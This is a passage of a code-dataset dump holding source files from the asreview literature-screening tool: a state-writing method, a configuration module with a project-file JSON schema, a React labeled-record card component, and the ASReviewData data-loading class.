self.pool[~self.pool.isin(record_ids)]\n\n if (self.write_interval is not None) and (\n len(self.results) >= self.write_interval\n ):\n self._write_to_state()\n\n return labels\n\n def _write_to_state(self):\n \"\"\"Write the data that has not yet been written to the state.\"\"\"\n # Write the data to the state.\n if len(self.results) > 0:\n rows = [tuple(self.results.iloc[i]) for i in range(len(self.results))]\n with open_state(self.project, read_only=False) as state:\n state._add_labeling_data_simulation_mode(rows)\n\n state.add_last_ranking(\n self.last_ranking[\"record_id\"].to_numpy(),\n self.classifier.name,\n self.query_strategy.name,\n self.balance_model.name,\n self.feature_extraction.name,\n self.training_set,\n )\n\n # Empty the results table in memory.\n self.results.drop(self.results.index, inplace=True)\n" }, { "alpha_fraction": 0.40704286098480225, "alphanum_fraction": 0.4314807057380676, "avg_line_length": 39.77854537963867, "blob_id": "c9ab9aee9b0f8aecb060425efbacf0ec41ed56e4", "content_id": "c2c96219a7bb828d795b0f23c16a129b933ddd1f", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11785, "license_type": "permissive", "max_line_length": 152, "num_lines": 289, "path": "/asreview/config.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nLABEL_NA = -1\n\nKERAS_MODELS = [\"lstm_base\", \"lstm_pool\"]\n\n# project types\nPROJECT_MODE_ORACLE = \"oracle\"\nPROJECT_MODE_EXPLORE = \"explore\"\nPROJECT_MODE_SIMULATE = \"simulate\"\nPROJECT_MODES = [PROJECT_MODE_ORACLE, PROJECT_MODE_EXPLORE, PROJECT_MODE_SIMULATE]\n\n# CLI defaults\nDEFAULT_MODEL = \"nb\"\nDEFAULT_QUERY_STRATEGY = \"max\"\nDEFAULT_BALANCE_STRATEGY = \"double\"\nDEFAULT_FEATURE_EXTRACTION = \"tfidf\"\nDEFAULT_N_INSTANCES = 1\nDEFAULT_N_PRIOR_INCLUDED = 1\nDEFAULT_N_PRIOR_EXCLUDED = 1\n\nLEGACY_STATE_EXTENSIONS = [\".h5\", \".hdf5\", \".he5\", \".json\"]\n\nCOLUMN_DEFINITIONS = {\n # included\n \"included\": [\n \"final_included\",\n \"label\",\n \"label_included\",\n \"included_label\",\n \"included_final\",\n \"included\",\n \"included_flag\",\n \"include\",\n ],\n # abstract included (pending deprecation)\n \"abstract_included\": [\n \"abstract_included\",\n \"included_abstract\",\n \"included_after_abstract\",\n \"label_abstract_screening\",\n ],\n \"title\": [\"title\", \"primary_title\"],\n \"authors\": [\"authors\", \"author names\", \"first_authors\"],\n \"abstract\": [\"abstract\", \"abstract note\", \"notes_abstract\"],\n \"notes\": [\"notes\"],\n \"keywords\": [\"keywords\"],\n \"doi\": [\"doi\"],\n}\n\n# the schema describes the content of the ASReview project file.\nSCHEMA = {\n \"$schema\": \"http://json-schema.org/draft-07/schema\",\n \"$id\": \"http://example.com/example.json\",\n \"type\": \"object\",\n \"title\": \"The ASReview project file root schema\",\n \"description\": \"The root schema comprises the entire project.json file in the ASReview project file.\",\n \"default\": {},\n \"examples\": [\n {\n \"version\": \"1.0\",\n \"id\": \"example\",\n \"mode\": \"oracle\",\n \"name\": \"example\",\n \"description\": \"\",\n \"authors\": \"\",\n \"created_at_unix\": 1648205610,\n \"datetimeCreated\": \"2022-03-25 11:53:30.510461\",\n \"reviews\": [\n {\n \"id\": \"4793de70a8d44eb4baa68bac2853c91a\",\n \"start_time\": \"2022-03-25 11:55:50.551360\",\n \"status\": \"review\",\n \"end_time\": \"2022-03-26 10:31:52.441360\",\n }\n ],\n \"feature_matrices\": [\n {\"id\": \"tfidf\", \"filename\": \"tfidf_feature_matrix.npz\"}\n ],\n \"dataset_path\": \"example.ris\",\n }\n ],\n \"required\": [\"version\", \"id\", \"mode\", \"name\"],\n \"properties\": {\n \"version\": {\n \"$id\": \"#/properties/version\",\n \"type\": \"string\",\n \"title\": \"The version schema\",\n \"description\": \"The version of ASReview on initiation of the project.\",\n \"default\": \"\",\n \"examples\": [\"1.0\"],\n },\n \"id\": {\n \"$id\": \"#/properties/id\",\n \"type\": \"string\",\n \"title\": \"The id schema\",\n \"description\": \"The unique identifier of the project.\",\n \"default\": \"\",\n \"examples\": [\"example\"],\n },\n \"mode\": {\n \"$id\": \"#/properties/mode\",\n \"type\": \"string\",\n \"title\": \"The mode schema\",\n \"description\": \"The mode of the project. 
One of oracle, explore, or simulate.\",\n \"default\": \"\",\n \"enum\": PROJECT_MODES,\n \"examples\": [\"oracle\"],\n },\n \"name\": {\n \"$id\": \"#/properties/name\",\n \"type\": [\"string\", \"null\"],\n \"title\": \"The name schema\",\n \"description\": \"The name of the project.\",\n \"default\": \"\",\n \"examples\": [\"example\"],\n },\n \"description\": {\n \"$id\": \"#/properties/description\",\n \"type\": [\"string\", \"null\"],\n \"title\": \"The description schema\",\n \"description\": \"The description of the project.\",\n \"default\": \"\",\n \"examples\": [\"\"],\n },\n \"authors\": {\n \"$id\": \"#/properties/authors\",\n \"type\": [\"string\", \"null\"],\n \"title\": \"The authors schema\",\n \"description\": \"The authors of the project.\",\n \"default\": \"\",\n \"examples\": [\"\"],\n },\n \"created_at_unix\": {\n \"$id\": \"#/properties/created_at_unix\",\n \"type\": [\"integer\", \"null\"],\n \"title\": \"The created_at_unix schema\",\n \"description\": \"The creation time of the project as a Unix timestamp.\",\n \"default\": 0,\n \"examples\": [1648205610],\n },\n \"datetimeCreated\": {\n \"$id\": \"#/properties/datetimeCreated\",\n \"type\": [\"string\", \"null\"],\n \"title\": \"The datetimeCreated schema\",\n \"description\": \"The date and time of the project creation.\",\n \"default\": \"\",\n \"examples\": [\"2022-03-25 11:53:30.510461\"],\n },\n \"reviews\": {\n \"$id\": \"#/properties/reviews\",\n \"type\": \"array\",\n \"title\": \"The reviews schema\",\n \"description\": \"The list of reviews in the project. Multiple reviews per project are possible; however, this is limited to 1 at the moment.\",\n \"default\": [],\n \"examples\": [\n [\n {\n \"id\": \"4793de70a8d44eb4baa68bac2853c91a\",\n \"start_time\": \"2022-03-25 11:55:50.551360\",\n \"status\": \"review\",\n }\n ]\n ],\n \"additionalItems\": True,\n \"items\": {\n \"$id\": \"#/properties/reviews/items\",\n \"anyOf\": [\n {\n \"$id\": \"#/properties/reviews/items/anyOf/0\",\n \"type\": \"object\",\n \"title\": \"The first anyOf schema\",\n \"description\": \"Information about a single review in the project.\",\n \"default\": {},\n \"examples\": [\n {\n \"id\": \"4793de70a8d44eb4baa68bac2853c91a\",\n \"start_time\": \"2022-03-25 11:55:50.551360\",\n \"status\": \"review\",\n }\n ],\n \"required\": [\"id\", \"start_time\", \"status\"],\n \"properties\": {\n \"id\": {\n \"$id\": \"#/properties/reviews/items/anyOf/0/properties/id\",\n \"type\": \"string\",\n \"title\": \"The id of the review.\",\n \"description\": \"A unique UUID4 identifier of the review.\",\n \"default\": \"\",\n \"examples\": [\"4793de70a8d44eb4baa68bac2853c91a\"],\n },\n \"start_time\": {\n \"$id\": \"#/properties/reviews/items/anyOf/0/properties/start_time\",\n \"type\": \"string\",\n \"title\": \"The start_time of the review.\",\n \"description\": \"The start date and time of the review.\",\n \"default\": \"\",\n \"examples\": [\"2022-03-25 11:55:50.551360\"],\n },\n \"end_time\": {\n \"$id\": \"#/properties/reviews/items/anyOf/0/properties/end_time\",\n \"type\": \"string\",\n \"title\": \"The end_time of the review.\",\n \"description\": \"The end date and time of the review.\",\n \"default\": \"\",\n \"examples\": [\"2022-03-26 10:31:52.441360\"],\n },\n \"status\": {\n \"$id\": \"#/properties/reviews/items/anyOf/0/properties/status\",\n \"type\": [\"string\", \"null\"],\n \"title\": \"The status of the review.\",\n \"description\": \"The status of the review. 
Options are setup, review, finished.\",\n \"enum\": [\"setup\", \"review\", \"finished\"],\n \"default\": \"setup\",\n \"examples\": [\"review\"],\n },\n },\n \"additionalProperties\": True,\n }\n ],\n },\n },\n \"feature_matrices\": {\n \"$id\": \"#/properties/feature_matrices\",\n \"type\": \"array\",\n \"title\": \"The feature_matrices schema\",\n \"description\": \"Information about the feature matrices.\",\n \"default\": [],\n \"examples\": [[{\"id\": \"tfidf\", \"filename\": \"tfidf_feature_matrix.npz\"}]],\n \"additionalItems\": True,\n \"items\": {\n \"$id\": \"#/properties/feature_matrices/items\",\n \"anyOf\": [\n {\n \"$id\": \"#/properties/feature_matrices/items/anyOf/0\",\n \"type\": \"object\",\n \"title\": \"The first anyOf schema\",\n \"description\": \"Information about a feature matrix.\",\n \"default\": {},\n \"examples\": [\n {\"id\": \"tfidf\", \"filename\": \"tfidf_feature_matrix.npz\"}\n ],\n \"required\": [\"id\", \"filename\"],\n \"properties\": {\n \"id\": {\n \"$id\": \"#/properties/feature_matrices/items/anyOf/0/properties/id\",\n \"type\": \"string\",\n \"title\": \"The id schema\",\n \"description\": \"A unique id of the feature matrix.\",\n \"default\": \"\",\n \"examples\": [\"tfidf\"],\n },\n \"filename\": {\n \"$id\": \"#/properties/feature_matrices/items/anyOf/0/properties/filename\",\n \"type\": \"string\",\n \"title\": \"The filename schema\",\n \"description\": \"The name of the file with the feature matrix. Usually a sparse matrix.\",\n \"default\": \"\",\n \"examples\": [\"tfidf_feature_matrix.npz\"],\n },\n },\n \"additionalProperties\": True,\n }\n ],\n },\n },\n \"dataset_path\": {\n \"$id\": \"#/properties/dataset_path\",\n \"type\": [\"string\", \"null\"],\n \"title\": \"The dataset_path schema\",\n \"description\": \"Name of the dataset file.\",\n \"default\": \"\",\n \"examples\": [\"example.ris\"],\n },\n },\n \"additionalProperties\": True,\n}\n" }, { "alpha_fraction": 0.3844626843929291, "alphanum_fraction": 0.38653793931007385, "avg_line_length": 31.501466751098633, "blob_id": "db42b6437785e2d74d5cd57666c809e451b37859", "content_id": "c5c82394cdb17aa37a38ee2dccb0cc4a977ccfa8", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 11083, "license_type": "permissive", "max_line_length": 79, "num_lines": 341, "path": "/asreview/webapp/src/ProjectComponents/HistoryComponents/LabeledRecordCard.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { useMutation, useQueryClient } from \"react-query\";\nimport { connect } from \"react-redux\";\nimport { useParams } from \"react-router-dom\";\nimport TruncateMarkup from \"react-truncate-markup\";\nimport {\n Box,\n Button,\n Card,\n CardActions,\n CardContent,\n IconButton,\n Link,\n Stack,\n Tooltip,\n Typography,\n} from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\n\nimport {\n LabelOff,\n Link as LinkIcon,\n Favorite,\n FavoriteBorder,\n} from \"@mui/icons-material\";\n\nimport { InlineErrorHandler } from \"../../Components\";\nimport { RecordCardNote } from \"../HistoryComponents\";\nimport { StyledIconButton } from \"../../StyledComponents/StyledButton.js\";\nimport { ProjectAPI } from \"../../api/index.js\";\nimport { mapStateToProps, projectModes } from \"../../globals.js\";\nimport { DOIIcon } from \"../../icons\";\n\nconst PREFIX = \"LabeledRecordCard\";\n\nconst classes = {\n root: `${PREFIX}-root`,\n cardActions: 
`${PREFIX}-card-actions`,\n};\n\nconst Root = styled(\"div\")(({ theme }) => ({\n [`& .${classes.root}`]: {\n borderRadius: 16,\n },\n\n [`& .${classes.cardActions}`]: {\n justifyContent: \"space-between\",\n },\n}));\n\nconst LabeledRecordCard = (props) => {\n const { project_id } = useParams();\n const queryClient = useQueryClient();\n\n const [recordReadMore, setRecordReadMore] = React.useState(null);\n const [note, setNote] = React.useState({\n data: null,\n editing: null,\n });\n\n const returnProjectId = () => {\n return !project_id ? props.project_id : project_id;\n };\n\n const { error, isError, isLoading, mutate, reset } = useMutation(\n ProjectAPI.mutateClassification,\n {\n mutationKey: \"mutateLabeledPriorKnowledge\",\n onSuccess: (data, variables) => {\n // update cached data\n queryClient.setQueryData(\n [\n \"fetchLabeledRecord\",\n {\n project_id: returnProjectId(),\n subset: props.returnSubset(),\n },\n ],\n (prev) => {\n return {\n ...prev,\n pages: prev.pages.map((page) => {\n return {\n ...page,\n result: page.result.map((value) => {\n return {\n ...value,\n included:\n value.id !== variables.doc_id\n ? value.included\n : variables.label,\n note:\n value.id !== variables.doc_id\n ? value.note\n : !variables.note\n ? null\n : variables.note,\n };\n }),\n };\n }),\n };\n },\n );\n if (variables.doc_id === recordReadMore) {\n setRecordReadMore(null);\n }\n if (variables.doc_id === note.editing) {\n setNote({\n data: null,\n editing: null,\n });\n }\n if (props.is_prior) {\n queryClient.invalidateQueries(\"fetchLabeledStats\");\n }\n },\n },\n );\n\n const handleClickLabelConvert = (value) => {\n mutate({\n project_id: returnProjectId(),\n doc_id: value.id,\n label: value.included === 1 ? 0 : 1,\n note: !value.note ? \"\" : value.note,\n initial: false,\n is_prior: !props.is_prior ? 0 : 1,\n });\n };\n\n const handleClickRemoveLabel = (value) => {\n mutate({\n project_id: returnProjectId(),\n doc_id: value.id,\n label: -1,\n note: !value.note ? \"\" : value.note,\n initial: false,\n is_prior: 1,\n });\n };\n\n const handleClickAddNote = (doc_id) => {\n setNote((s) => {\n return {\n ...s,\n editing: doc_id,\n };\n });\n };\n\n const disableAddNoteButton = (doc_id) => {\n return doc_id !== note.editing && note.editing !== null;\n };\n\n // only on history page\n const disableConvertPrior = (prior) => {\n return !props.is_prior && prior === 1;\n };\n\n const isSimulationProject = () => {\n return props.mode === projectModes.SIMULATION;\n };\n\n return (\n <Root>\n <Stack spacing={3}>\n {isError && (\n <Box sx={{ pt: 8, pb: 16 }}>\n <InlineErrorHandler\n message={error[\"message\"]}\n refetch={reset}\n button={true}\n />\n </Box>\n )}\n {!isError &&\n props.page.result\n .filter((value) => value.included !== -1)\n .map((value) => (\n <Card elevation={3} className={classes.root} key={value.id}>\n <CardContent className=\"record-card-content\">\n <Stack spacing={1}>\n <Typography variant=\"h6\">\n {value.title ? 
value.title : \"No title available\"}\n </Typography>\n {!props.is_prior && (value.doi || value.url) && (\n <Stack direction=\"row\" spacing={1}>\n {/* Show DOI if available */}\n {value.doi && (\n <StyledIconButton\n className=\"record-card-icon\"\n href={\"https://doi.org/\" + value.doi}\n target=\"_blank\"\n rel=\"noreferrer\"\n >\n <DOIIcon />\n </StyledIconButton>\n )}\n\n {/* Show URL if available */}\n {value.url && (\n <Tooltip title=\"Open URL\">\n <StyledIconButton\n className=\"record-card-icon\"\n href={value.url}\n target=\"_blank\"\n rel=\"noreferrer\"\n >\n <LinkIcon />\n </StyledIconButton>\n </Tooltip>\n )}\n </Stack>\n )}\n <TruncateMarkup\n lines={value.id === recordReadMore ? Infinity : 6}\n ellipsis={\n <span>\n ...{\" \"}\n <Link\n component=\"button\"\n underline=\"none\"\n onClick={() => setRecordReadMore(value.id)}\n >\n read more\n </Link>\n </span>\n }\n >\n <Typography color=\"textSecondary\">\n {value.abstract\n ? value.abstract\n : \"No abstract available\"}\n </Typography>\n </TruncateMarkup>\n </Stack>\n </CardContent>\n <CardActions className={classes.cardActions}>\n <Tooltip\n title={\n !isSimulationProject()\n ? disableConvertPrior(value.prior)\n ? \"Prior knowledge cannot be converted\"\n : note.editing !== value.id\n ? value.included === 1\n ? \"Convert to irrelevant\"\n : \"Convert to relevant\"\n : \"Save note before converting\"\n : \"Cannot be converted in simulation mode\"\n }\n >\n <span>\n <IconButton\n disabled={\n isSimulationProject() ||\n disableConvertPrior(value.prior) ||\n isLoading ||\n note.editing === value.id\n }\n onClick={() => {\n handleClickLabelConvert(value);\n }}\n >\n {value.included === 1 ? (\n <Favorite\n color=\"error\"\n fontSize={!props.mobileScreen ? \"medium\" : \"small\"}\n />\n ) : (\n <FavoriteBorder\n fontSize={!props.mobileScreen ? \"medium\" : \"small\"}\n />\n )}\n </IconButton>\n </span>\n </Tooltip>\n {props.is_prior && (\n <Tooltip\n title={`Remove ${\n value.included !== 1 ? \"irrelevant\" : \"relevant\"\n } label`}\n >\n <span>\n <IconButton\n disabled={isLoading}\n onClick={() => {\n handleClickRemoveLabel(value);\n }}\n >\n <LabelOff\n fontSize={!props.mobileScreen ? \"medium\" : \"small\"}\n />\n </IconButton>\n </span>\n </Tooltip>\n )}\n {!props.is_prior &&\n !value.note &&\n value.id !== note.editing && (\n <Tooltip\n title={\n !props.isSimulating\n ? !disableAddNoteButton(value.id)\n ? \"\"\n : \"Save another note before adding\"\n : \"Add note after simulation is finished\"\n }\n >\n <span>\n <Button\n disabled={\n props.isSimulating ||\n disableAddNoteButton(value.id)\n }\n onClick={() => handleClickAddNote(value.id)}\n size={!props.mobileScreen ? 
\"medium\" : \"small\"}\n >\n Add note\n </Button>\n </span>\n </Tooltip>\n )}\n </CardActions>\n <RecordCardNote\n isLoading={isLoading}\n record={value}\n mobileScreen={props.mobileScreen}\n mutate={mutate}\n note={note}\n setNote={setNote}\n is_prior={props.is_prior}\n />\n </Card>\n ))}\n </Stack>\n </Root>\n );\n};\n\nexport default connect(mapStateToProps)(LabeledRecordCard);\n" }, { "alpha_fraction": 0.578102707862854, "alphanum_fraction": 0.5802730321884155, "avg_line_length": 29.934629440307617, "blob_id": "f4ca8eeda2165965dd210010a148d9d075bf87fa", "content_id": "df7aba84543a33bdfd0cab83e5339040ebc44295", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 17509, "license_type": "permissive", "max_line_length": 87, "num_lines": 566, "path": "/asreview/data/base.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport hashlib\nfrom io import StringIO\nfrom pathlib import Path\n\nimport numpy as np\nimport pandas as pd\nfrom pandas.api.types import is_object_dtype\nfrom pandas.api.types import is_string_dtype\n\nfrom asreview.config import COLUMN_DEFINITIONS\nfrom asreview.config import LABEL_NA\nfrom asreview.datasets import DatasetManager\nfrom asreview.datasets import DatasetNotFoundError\nfrom asreview.exceptions import BadFileFormatError\nfrom asreview.io import PaperRecord\nfrom asreview.io.utils import convert_keywords\nfrom asreview.io.utils import type_from_column\nfrom asreview.utils import _entry_points\nfrom asreview.utils import _get_filename_from_url\nfrom asreview.utils import is_iterable\nfrom asreview.utils import is_url\n\n\ndef load_data(name, *args, **kwargs):\n \"\"\"Load data from file, URL, or plugin.\n\n Parameters\n ----------\n name: str, pathlib.Path\n File path, URL, or alias of extension dataset.\n\n Returns\n -------\n asreview.ASReviewData:\n Inititalized ASReview data object.\n \"\"\"\n\n # check is file or URL\n if is_url(name) or Path(name).exists():\n return ASReviewData.from_file(name, *args, **kwargs)\n\n # check if dataset is plugin dataset\n try:\n return ASReviewData.from_extension(name, *args, **kwargs)\n except DatasetNotFoundError:\n pass\n\n # Could not find dataset, return None.\n raise FileNotFoundError(f\"File, URL, or dataset does not exist: '{name}'\")\n\n\nclass ASReviewData:\n \"\"\"Data object to the dataset with texts, labels, DOIs etc.\n\n Arguments\n ---------\n df: pandas.DataFrame\n Dataframe containing the data for the ASReview data object.\n column_spec: dict\n Specification for which column corresponds to which standard\n specification. Key is the standard specification, key is which column\n it is actually in. 
Default: None.\n\n Attributes\n ----------\n record_ids: numpy.ndarray\n Return an array representing the data in the Index.\n texts: numpy.ndarray\n Returns an array with either headings, bodies, or both.\n headings: numpy.ndarray\n Returns an array with dataset headings.\n title: numpy.ndarray\n Identical to headings.\n bodies: numpy.ndarray\n Returns an array with dataset bodies.\n abstract: numpy.ndarray\n Identical to bodies.\n notes: numpy.ndarray\n Returns an array with dataset notes.\n keywords: numpy.ndarray\n Returns an array with dataset keywords.\n authors: numpy.ndarray\n Returns an array with dataset authors.\n doi: numpy.ndarray\n Returns an array with dataset DOI.\n included: numpy.ndarray\n Returns an array with document inclusion markers.\n final_included: numpy.ndarray\n Pending deprecation! Returns an array with document inclusion markers.\n labels: numpy.ndarray\n Identical to included.\n\n \"\"\"\n\n def __init__(self, df=None, column_spec=None):\n self.df = df\n self.prior_idx = np.array([], dtype=int)\n self.max_idx = max(df.index.values) + 1\n\n # Infer column specifications if it is not given.\n if column_spec is None:\n self.column_spec = {}\n for col_name in list(df):\n data_type = type_from_column(col_name, COLUMN_DEFINITIONS)\n if data_type is not None:\n self.column_spec[data_type] = col_name\n else:\n self.column_spec = column_spec\n\n if \"included\" not in self.column_spec:\n self.column_spec[\"included\"] = \"included\"\n\n def __len__(self):\n if self.df is None:\n return 0\n return len(self.df.index)\n\n def hash(self):\n \"\"\"Compute a hash from the dataset.\n\n Returns\n -------\n str:\n SHA1 hash, computed from the titles/abstracts of the dataframe.\n \"\"\"\n if (\n len(self.df.index) < 1000 and self.bodies is not None\n ) or self.texts is None:\n texts = \" \".join(self.bodies)\n else:\n texts = \" \".join(self.texts)\n return hashlib.sha1(\n \" \".join(texts).encode(encoding=\"UTF-8\", errors=\"ignore\")\n ).hexdigest()\n\n @classmethod\n def from_file(cls, fp, reader=None):\n \"\"\"Create instance from supported file format.\n\n It works in two ways; either manual control where the conversion\n functions are supplied or automatic, where it searches in the entry\n points for the right conversion functions.\n\n Arguments\n ---------\n fp: str, pathlib.Path\n Read the data from this file or url.\n reader: class\n Reader to import the file.\n \"\"\"\n\n if reader is not None:\n return cls(reader.read_data(fp))\n\n # get the filename from a url else file path\n if is_url(fp):\n fn = _get_filename_from_url(fp)\n else:\n fn = Path(fp).name\n\n try:\n reader = _entry_points(\n group=\"asreview.readers\")[Path(fn).suffix].load()\n except Exception:\n raise BadFileFormatError(f\"Importing file {fp} not possible.\")\n\n df, column_spec = reader.read_data(fp)\n\n return cls(df, column_spec=column_spec)\n\n @classmethod\n def from_extension(cls, name, reader=None):\n \"\"\"Load a dataset from extension.\n\n Arguments\n ---------\n fp: str, pathlib.Path\n Read the data from this file or url.\n reader: class\n Reader to import the file.\n \"\"\"\n\n dataset = DatasetManager().find(name)\n\n if dataset.filepath:\n fp = dataset.filepath\n else:\n # build dataset to temporary file\n reader = dataset.reader()\n fp = StringIO(dataset.to_file())\n\n if reader is None:\n # get the filename from a url else file path\n if is_url(fp):\n fn = _get_filename_from_url(fp)\n else:\n fn = Path(fp).name\n\n try:\n reader = _entry_points(\n 
group=\"asreview.readers\")[Path(fn).suffix].load()\n except Exception:\n raise BadFileFormatError(f\"Importing file {fp} not possible.\")\n\n df, column_spec = reader.read_data(fp)\n\n return cls(df, column_spec=column_spec)\n\n def record(self, i, by_index=True):\n \"\"\"Create a record from an index.\n\n Arguments\n ---------\n i: int, iterable\n Index of the record, or list of indices.\n by_index: bool\n If True, take the i-th value as used internally by the review.\n If False, take the record with record_id==i.\n\n Returns\n -------\n PaperRecord\n The corresponding record if i was an integer, or a list of records\n if i was an iterable.\n \"\"\"\n if not is_iterable(i):\n index_list = [i]\n else:\n index_list = i\n\n if by_index:\n records = [\n PaperRecord(\n **self.df.iloc[j],\n column_spec=self.column_spec,\n record_id=self.df.index.values[j],\n )\n for j in index_list\n ]\n else:\n records = [\n PaperRecord(\n **self.df.loc[j, :], record_id=j, column_spec=self.column_spec\n )\n for j in index_list\n ]\n\n if is_iterable(i):\n return records\n return records[0]\n\n @property\n def record_ids(self):\n return self.df.index.values\n\n @property\n def texts(self):\n if self.title is None:\n return self.abstract\n if self.abstract is None:\n return self.title\n\n cur_texts = np.array(\n [self.title[i] + \" \" + self.abstract[i] for i in range(len(self))],\n dtype=object,\n )\n return cur_texts\n\n @property\n def headings(self):\n return self.title\n\n @property\n def title(self):\n try:\n return self.df[self.column_spec[\"title\"]].values\n except KeyError:\n return None\n\n @property\n def bodies(self):\n return self.abstract\n\n @property\n def abstract(self):\n try:\n return self.df[self.column_spec[\"abstract\"]].values\n except KeyError:\n return None\n\n @property\n def notes(self):\n try:\n return self.df[self.column_spec[\"notes\"]].values\n except KeyError:\n return None\n\n @property\n def keywords(self):\n try:\n return self.df[self.column_spec[\"keywords\"]].apply(convert_keywords).values\n except KeyError:\n return None\n\n @property\n def authors(self):\n try:\n return self.df[self.column_spec[\"authors\"]].values\n except KeyError:\n return None\n\n @property\n def doi(self):\n try:\n return self.df[self.column_spec[\"doi\"]].values\n except KeyError:\n return None\n\n @property\n def url(self):\n try:\n return self.df[self.column_spec[\"url\"]].values\n except KeyError:\n return None\n\n def get(self, name):\n \"Get column with name.\"\n try:\n return self.df[self.column_spec[name]].values\n except KeyError:\n return self.df[name].values\n\n @property\n def prior_data_idx(self):\n \"Get prior_included, prior_excluded from dataset.\"\n convert_array = np.full(self.max_idx, 999999999)\n convert_array[self.df.index.values] = np.arange(len(self.df.index))\n return convert_array[self.prior_idx]\n\n @property\n def included(self):\n return self.labels\n\n @included.setter\n def included(self, labels):\n self.labels = labels\n\n @property # pending deprecation\n def final_included(self):\n return self.labels\n\n @final_included.setter # pending deprecation\n def final_included(self, labels):\n self.labels = labels\n\n @property\n def labels(self):\n try:\n column = self.column_spec[\"included\"]\n return self.df[column].values\n except KeyError:\n return None\n\n @labels.setter\n def labels(self, labels):\n try:\n column = self.column_spec[\"included\"]\n self.df[column] = labels\n except KeyError:\n self.df[\"included\"] = labels\n\n def prior_labels(self, state, 
by_index=True):\n \"\"\"Get the labels that are marked as 'prior'.\n\n state: BaseState\n Open state that contains the label information.\n by_index: bool\n If True, return internal indexing.\n If False, return record_ids for indexing.\n\n Returns\n -------\n numpy.ndarray\n Array of indices that have the 'prior' property.\n \"\"\"\n prior_indices = state.get_priors()[\"record_id\"].to_list()\n\n if by_index:\n return np.array(prior_indices, dtype=int)\n else:\n return self.df.index.values[prior_indices]\n\n def to_file(self, fp, labels=None, ranking=None, writer=None):\n \"\"\"Export data object to file.\n\n RIS, CSV, TSV and Excel are supported file formats at the moment.\n\n Arguments\n ---------\n fp: str\n Filepath to export to.\n labels: list, numpy.ndarray\n Labels to be inserted into the dataframe before export.\n ranking: list, numpy.ndarray\n Optionally, dataframe rows can be reordered.\n writer: class\n Writer to export the file.\n \"\"\"\n df = self.to_dataframe(labels=labels, ranking=ranking)\n\n if writer is not None:\n writer.write_data(df, fp, labels=labels, ranking=ranking)\n else:\n best_suffix = None\n\n for entry in _entry_points(group=\"asreview.writers\"):\n if Path(fp).suffix == entry.name:\n if best_suffix is None or len(entry.name) > len(best_suffix):\n best_suffix = entry.name\n\n if best_suffix is None:\n raise BadFileFormatError(\n f\"Error exporting file {fp}, no capabilities \"\n \"for exporting such a file.\"\n )\n\n writer = _entry_points(group=\"asreview.writers\")[best_suffix].load()\n writer.write_data(df, fp, labels=labels, ranking=ranking)\n\n def to_dataframe(self, labels=None, ranking=None):\n \"\"\"Create new dataframe with updated label (order).\n\n Arguments\n ---------\n labels: list, numpy.ndarray\n Current labels will be overwritten by these labels\n (including unlabelled). 
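Each entry is expected as a\n (record_id, label) tuple, matching the unnesting applied in the\n implementation below.\n 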
No effect if labels is None.\n ranking: list\n Reorder the dataframe according to these record_ids.\n Default ordering if ranking is None.\n\n Returns\n -------\n pandas.DataFrame\n Dataframe of all available record data.\n \"\"\"\n result_df = pd.DataFrame.copy(self.df)\n col_label = self.column_spec[\"included\"]\n\n # if there are labels, add them to the frame\n if labels is not None:\n # unnest the nested (record_id, label) tuples\n labeled_record_ids = [x[0] for x in labels]\n labeled_values = [x[1] for x in labels]\n\n # remove the old results and write the values\n result_df[col_label] = LABEL_NA\n result_df.loc[labeled_record_ids, col_label] = labeled_values\n\n # if there is a ranking, apply this ranking as order\n if ranking is not None:\n # sort the datasets based on the ranking\n result_df = result_df.loc[ranking]\n # append a column with 1 to n\n result_df[\"asreview_ranking\"] = np.arange(1, len(result_df) + 1)\n\n # replace labeled NA values by np.nan\n if col_label in list(result_df):\n result_df[col_label] = result_df[col_label].astype(object)\n result_df.loc[result_df[col_label] == LABEL_NA, col_label] = np.nan\n\n return result_df\n\n def duplicated(self, pid=\"doi\"):\n \"\"\"Return boolean Series denoting duplicate rows.\n\n Identify duplicates based on titles and abstracts and if available,\n on a persistent identifier (PID) such as the Digital Object Identifier\n (`DOI <https://www.doi.org/>`_).\n\n Arguments\n ---------\n pid: string\n Which persistent identifier to use for deduplication.\n Default is 'doi'.\n\n Returns\n -------\n pandas.Series\n Boolean series marking the duplicated rows.\n \"\"\"\n if pid in self.df.columns:\n # in case of strings, strip whitespaces and replace empty strings with None\n if is_string_dtype(self.df[pid]) or is_object_dtype(self.df[pid]):\n s_pid = self.df[pid].str.strip().replace(\"\", None)\n else:\n s_pid = self.df[pid]\n\n # save boolean series for duplicates based on persistent identifiers\n s_dups_pid = (s_pid.duplicated()) & (s_pid.notnull())\n else:\n s_dups_pid = None\n\n # get the texts, clean them and replace empty strings with None\n s = (\n pd.Series(self.texts)\n .str.replace(\"[^A-Za-z0-9]\", \"\", regex=True)\n .str.lower()\n .str.strip()\n .replace(\"\", None)\n )\n\n # save boolean series for duplicates based on titles/abstracts\n s_dups_text = (s.duplicated()) & (s.notnull())\n\n # final boolean series for all duplicates\n if s_dups_pid is not None:\n s_dups = s_dups_pid | 